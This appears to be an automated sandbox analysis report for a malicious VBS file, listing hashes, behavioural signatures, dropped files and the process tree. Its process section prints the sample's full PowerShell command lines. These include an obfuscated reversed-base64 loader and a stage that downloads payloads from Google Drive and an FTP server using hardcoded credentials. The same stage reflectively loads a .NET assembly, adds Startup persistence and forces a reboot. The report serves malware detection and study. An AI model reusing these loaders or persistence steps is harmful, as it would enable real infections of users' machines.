Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 11:09
Static task
static1
Behavioral task
behavioral1
Sample
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
Resource
win10v2004-20240704-en
General
-
Target
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
-
Size
703KB
-
MD5
f1b75f0121271d4e6f174d28e3821244
-
SHA1
4d3ece676f79050cfa65c539edf6c34b29d82038
-
SHA256
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761
-
SHA512
3ae88843320ef8cc73b311c84fc0158a439e83bf08c612a6757cc2c1ae9ffd9d091400a3ac354abeff3f6274222ef995bf5d4a57f74d084790313105a24d6437
-
SSDEEP
1536:oeeeeeeeeeeeeeeeeeeeeeee5WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWC:i
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2268 powershell.exe 7 2268 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File opened for modification C:\Windows\Logs\DPX\setupact.log wusa.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log wusa.exe File opened for modification C:\Windows\WindowsUpdate.log wusa.exe -
pid Process 1208 powershell.exe 2268 powershell.exe 2912 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1208 powershell.exe 2268 powershell.exe 2160 powershell.exe 2912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1996 wrote to memory of 1208 1996 WScript.exe 30 PID 1996 wrote to memory of 1208 1996 WScript.exe 30 PID 1996 wrote to memory of 1208 1996 WScript.exe 30 PID 1208 wrote to memory of 2268 1208 powershell.exe 32 PID 1208 wrote to memory of 2268 1208 powershell.exe 32 PID 1208 wrote to memory of 2268 1208 powershell.exe 32 PID 2268 wrote to memory of 2160 2268 powershell.exe 34 PID 2268 wrote to memory of 2160 2268 powershell.exe 34 PID 2268 wrote to memory of 2160 2268 powershell.exe 34 PID 2160 wrote to memory of 1312 2160 powershell.exe 35 PID 2160 wrote to memory of 1312 2160 powershell.exe 35 PID 2160 wrote to memory of 1312 2160 powershell.exe 35 PID 2268 wrote to memory of 2912 2268 powershell.exe 36 PID 2268 wrote to memory of 2912 2268 powershell.exe 36 PID 2268 wrote to memory of 2912 2268 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$tEIHp = 'Ow℻_レ9ADsAKQAgACkAIAAnADEAZQ℻_レ1AHIAdAAnACAALAAgAHYATw℻_レhAFoARwAkACAALAAgACcAaA℻_レ0AHQAcA℻_レzADoALwAvAHMAaA℻_レhAHIAZQ℻_レ0AGUAeA℻_レ0AC4AbQ℻_レlAC8Acg℻_レhAHcALw℻_レvAGsAcw℻_レ2ADgAZA℻_レtAHUANA℻_レ2ACcAIAAoACAAXQ℻_レdAFsAdA℻_レjAGUAag℻_レiAG8AWwAgACwAIA℻_レsAGwAdQ℻_レuACQAIAAoAGUAaw℻_レvAHYAbg℻_レJAC4AKQAgACcASQ℻_レWAEYAcg℻_レwACcAIAAoAGQAbw℻_レoAHQAZQ℻_レNAHQAZQ℻_レHAC4AKQAnADEAcw℻_レzAGEAbA℻_レDAC4AMw℻_レ5AHIAYQ℻_レyAGIAaQ℻_レMAHMAcw℻_レhAGwAQwAnACgAZQ℻_レwAHkAVA℻_レ0AGUARwAuACkAIA℻_レ4AG0Aeg℻_レYAHgAJAAgACgAZA℻_レhAG8ATAAuAG4AaQ℻_レhAG0Abw℻_レEAHQAbg℻_レlAHIAcg℻_レ1AEMAOgA6AF0Abg℻_レpAGEAbQ℻_レvAEQAcA℻_レwAEEALg℻_レtAGUAdA℻_レzAHkAUw℻_レbADsAKQAgACkAIAAnAEEAJwAgACwAIAAnAJMhOgCTIScAIAAoAGUAYw℻_レhAGwAcA℻_レlAFIALg℻_レUAHQAQg℻_レCAFEAJAAgACgAZw℻_レuAGkAcg℻_レ0AFMANAA2AGUAcw℻_レhAEIAbQ℻_レvAHIARgA6ADoAXQ℻_レ0AHIAZQ℻_レ2AG4Abw℻_レDAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レ4AG0Aeg℻_レYAHgAJAAgAF0AXQ℻_レbAGUAdA℻_レ5AEIAWwA7ACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAPQAgAHYATw℻_レhAFoARwAkADsAKQAgAFQAZA℻_レTAFUAWgAkACAAKA℻_レnAG4AaQ℻_レyAHQAUw℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レUAHQAQg℻_レCAFEAJAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AVA℻_レ0AEIAQg℻_レRACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAVA℻_レ0AEIAQg℻_レRACQAOwApACgAZQ℻_レzAG8AcA℻_レzAGkAZAAuAFQAdA℻_レCAEIAUQAkADsAKQAgACcAdA℻_レ4AHQALgAxADAATA℻_レMAEQALwAxADAALw℻_レyAGUAdA℻_レwAHkAcg℻_レjAHAAVQAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAuAHAAdA℻_レmAC8ALwA6AHAAdA℻_レmACcAIAAoAGcAbg℻_レpAHIAdA℻_レTAGQAYQ℻_レvAGwAbg℻_レ3AG8ARAAuAFQAdA℻_レCAEIAUQAkACAAPQAgAFQAZA℻_レTAFUAWgAkADsAKQAnACoAcA℻_レKADMANQA3ADkANQAxACcALAAnAHQAYQ℻_レyAGIAdg℻_レrAGMAcw℻_レlAGQAJwAoAGwAYQ℻_レpAHQAbg℻_レlAGQAZQ℻_レyAEMAaw℻_レyAG8Adw℻_レ0AGUATgAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAIA℻_レ0AGMAZQ℻_レqAGIAbwAtAHcAZQ℻_レuACAAPQAgAHMAbA℻_レhAGkAdA℻_レuAGUAZA℻_レlAHIAQwAuAFQAdA℻_レCAEIAUQAkADsAOA℻_レGAFQAVQA6ADoAXQ℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レ0AHgAZQ℻_レUAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レUAHQAQg℻_レCAFEAJAA7ACkAdA℻_レuAGUAaQ℻_レsAEMAYg℻_レlAFcALg℻_レ0AGUATgAgAHQAYw℻_レlAGoAYg℻_レPAC0Adw℻_レlAE4AKAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7AFQAZA℻_レTAFUAWgAkADsAMgAxAHMAbA℻_レUADoAOg℻_レdAGUAcA℻_レ5AFQAbA℻_レvAGMAbw℻_レ0AG8Acg℻_レQAHkAdA℻_レpAHIAdQ℻_レjAGUAUwAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レsAG8AYw℻_レvAHQAbw℻_レyAFAAeQ℻_レ0AGkAcg℻_レ1AGMAZQ℻_レTADoAOg℻_レdAHIAZQ℻_レnAGEAbg℻_レhAE0AdA℻_レuAGkAbw℻_レQAGUAYw℻_レpAHYAcg℻_レlAFMALg℻_レ0AGUATgAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAOw℻_レ9AGUAdQ℻_レyAHQAJA℻_レ7ACAAPQAgAGsAYw℻_レhAGIAbA℻_レsAGEAQw℻_レuAG8AaQ℻_レ0AGEAZA℻_レpAGwAYQ℻_レWAGUAdA℻_レhAGMAaQ℻_レmAGkAdA℻_レyAGUAQw℻_レyAGUAdg℻_レyAGUAUwA6ADoAXQ℻_レyAGUAZw℻_レhAG4AYQ℻_レNAHQAbg℻_レpAG8AUA℻_レlAGMAaQ℻_レ2AHIAZQ℻_レTAC4AdA℻_レlAE4ALg℻_レtAGUAdA℻_レzAHkAUw℻_レbAHsAIA℻_レlAHMAbA℻_レlAH0AIA℻_レmAC8AIAAwACAAdAAvACAAcgAvACAAZQ℻_レ4AGUALg℻_レuAHcAbw℻_レkAHQAdQ℻_レoAHMAIAA7ACcAMAA4ADEAIA℻_レwAGUAZQ℻_レsAHMAJwAgAGQAbg℻_レhAG0AbQ℻_レvAGMALQAgAGUAeA℻_レlAC4AbA℻_レsAGUAaA℻_レzAHIAZQ℻_レ3AG8AcAA7ACAAZQ℻_レjAHIAbw℻_レmAC0AIAApACAAJw℻_レwAHUAdA℻_レyAGEAdA℻_レTAFwAcw℻_レtAGEAcg℻_レnAG8Acg℻_レQAFwAdQ℻_レuAGUATQAgAHQAcg℻_レhAHQAUw℻_レcAHMAdw℻_レvAGQAbg℻_レpAFcAXA℻_レ0AGYAbw℻_レzAG8Acg℻_レjAGkATQ℻_レcAGcAbg℻_レpAG0AYQ℻_レvAFIAXA℻_レhAHQAYQ℻_レEAHAAcA℻_レ℻_レAFwAJwAgACsAIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAAgACgAIA℻_レuAG8AaQ℻_レ0AGEAbg℻_レpAHQAcw℻_レlAEQALQAgACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAbQ℻_レlAHQASQAtAHkAcA℻_レvAEMAIAA7ACAAdA℻_レyAGEAdA℻_レzAGUAcg℻_レvAG4ALwAgAHQAZQ℻_レpAHUAcQAvACAAZQ℻_レsAGkAZgAkACAAZQ℻_レ4AGUALg℻_レhAHMAdQ℻_レ3ACAAZQ℻_レ4AGUALg℻_レsAGwAZQ℻_レoAHMAcg℻_レlAHcAbw℻_レwACAAOwApACcAdQ℻_レzAG0ALg℻_レuAGkAdw℻_レwAFUAXAAnACAAKwAgAGEAdA℻_レzAGEAcAAkACgAIAA9ACAAZQ℻_レsAGkAZgAkADsAKQAgAGUAbQ℻_レhAE4Acg℻_レlAHMAVQA6ADoAXQ℻_レ0AG4AZQ℻_レtAG4Abw℻_レyAGkAdg℻_レuAEUAWwAgACsAIAAnAFwAcw℻_レyAGUAcw℻_レVAFwAOg℻_レDACcAKAAgAD0AIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAIAAsAEIASw℻_レMAFIAVQAkACgAZQ℻_レsAGkARg℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レhAGkAUg℻_レDAE8AJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AYQ℻_レpAFIAQw℻_レPACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAYQ℻_レpAFIAQw℻_レPACQAOw℻_レ9ADsAIAApACcAcg℻_レnADgARAA3AG8AUg℻_レzAGYAVg℻_レjAHIAMg℻_レuAEEAaA℻_レmAGgAVgA2AEQAQw℻_レ4AFIAcQ℻_レuAHEAagA1AGoAcg℻_レiADEAJwAgACsAIA℻_レCAEsATA℻_レSAFUAJAAoACAAPQAgAEIASw℻_レMAFIAVQAkAHsAIA℻_レlAHMAbA℻_レlAH0AOwAgACkAJw℻_レ4ADQAZg℻_レoAFoATQ℻_レ3AE4ANw℻_レVAGUAXwAwAF8ANQ℻_レfAGkAYw℻_レzAGIAaAA3AEMAUAAwAEkAZg℻_レQAGQAQQAyADEAMQAnACAAKwAgAEIASw℻_レMAFIAVQAkACgAIAA9ACAAQg℻_レLAEwAUg℻_レVACQAewAgACkAcg℻_レlAFYAbg℻_レpAFcAJAAoACAAZg℻_レpADsAIAApACcANAA2ACcAKA℻_レzAG4AaQ℻_レhAHQAbg℻_レvAEMALg℻_レFAFIAVQ℻_レUAEMARQ℻_レUAEkASA℻_レDAFIAQQ℻_レfAFIATw℻_レTAFMARQ℻_レDAE8AUg℻_レQADoAdg℻_レuAGUAJAAgAD0AIA℻_レyAGUAVg℻_レuAGkAVwAkADsAJwA9AGQAaQAmAGQAYQ℻_レvAGwAbg℻_レ3AG8AZAA9AHQAcg℻_レvAHAAeA℻_レlAD8AYw℻_レ1AC8AbQ℻_レvAGMALg℻_レlAGwAZw℻_レvAG8AZwAuAGUAdg℻_レpAHIAZAAvAC8AOg℻_レzAHAAdA℻_レ0AGgAJwAgAD0AIA℻_レCAEsATA℻_レSAFUAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAKAAgAGwAZQ℻_レkADsAKQAoAGgAdA℻_レhAFAAcA℻_レtAGUAVA℻_レ0AGUARwA6ADoAXQ℻_レoAHQAYQ℻_レQAC4ATw℻_レJAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レhAHQAcw℻_レhAHAAJA℻_レ7ACAAKQ℻_レyAGUAdw℻_レvAHAAcg℻_レlAFYAJAAoACAAZg℻_レpADsAIAApADIAKA℻_レzAGwAYQ℻_レ1AHEARQAuAHIAbw℻_レqAGEATQAuAG4Abw℻_レpAHMAcg℻_レlAFYALg℻_レ0AHMAbw℻_レoACQAIAA9ACAAcg℻_レlAHcAbw℻_レwAHIAZQ℻_レWACQAIAA7AA==';$mGvNv = $tEIHp.replace('℻_レ' , 'B') ;$xBEkr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $mGvNv ) ); $xBEkr = $xBEkr[-1..-$xBEkr.Length] -join '';$xBEkr = $xBEkr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs');powershell $xBEkr2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$URLKB = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$URLKB = ($URLKB + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$URLKB = ($URLKB + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OCRia = (New-Object Net.WebClient);$OCRia.Encoding = [System.Text.Encoding]::UTF8;$OCRia.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$ZUSdT;$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT.Credentials = new-object System.Net.NetworkCredential('desckvbrat','159753Jp*');$ZUSdT = $QBBtT.DownloadString( 'ftp://ftp.desckvbrat.com.br/desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$QBBtT.dispose();$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT = $QBBtT.DownloadString( $ZUSdT );$GZaOv = 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $QBBtT.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'v4umd8vsko/war/em.txeterahs//:sptth' , $GZaOv , 'true1' ) );};"3⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\wusa.exe"C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart5⤵
- Drops file in Windows directory
PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e52adbb6a26225461105a6c96abfa097
SHA191dc3ecad925526aac6ddcb2f87215ad8ce6f5d1
SHA256a4f11549b56087814feebe31b3369f0f63c9d8f23eec23b6268a25cc7b09c976
SHA51202bdd32d90fb81ecb836df3c4f95e2545a1e8b7563c73279771f65faff85e5de8ff654204f31516a2bc8f62ef293697e541d4bb29e679a6c0f08284dc3d4816c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5614a31bcd8a0c4ff6807318be2753105
SHA1597cf219f386aa084704faed49c74e77dbc71234
SHA256b43aeb9e55f74bf45e8849d9ccc715d8f6ea5b972e675148d437579c25080e4e
SHA512b986fe0b484ad36d2af4a2b199676db76eeeb8f76f85e75096e6866c410418f919faa26f09a4269cd7c46ff6766b94770902a30812964a74e4c98a9b16300bc5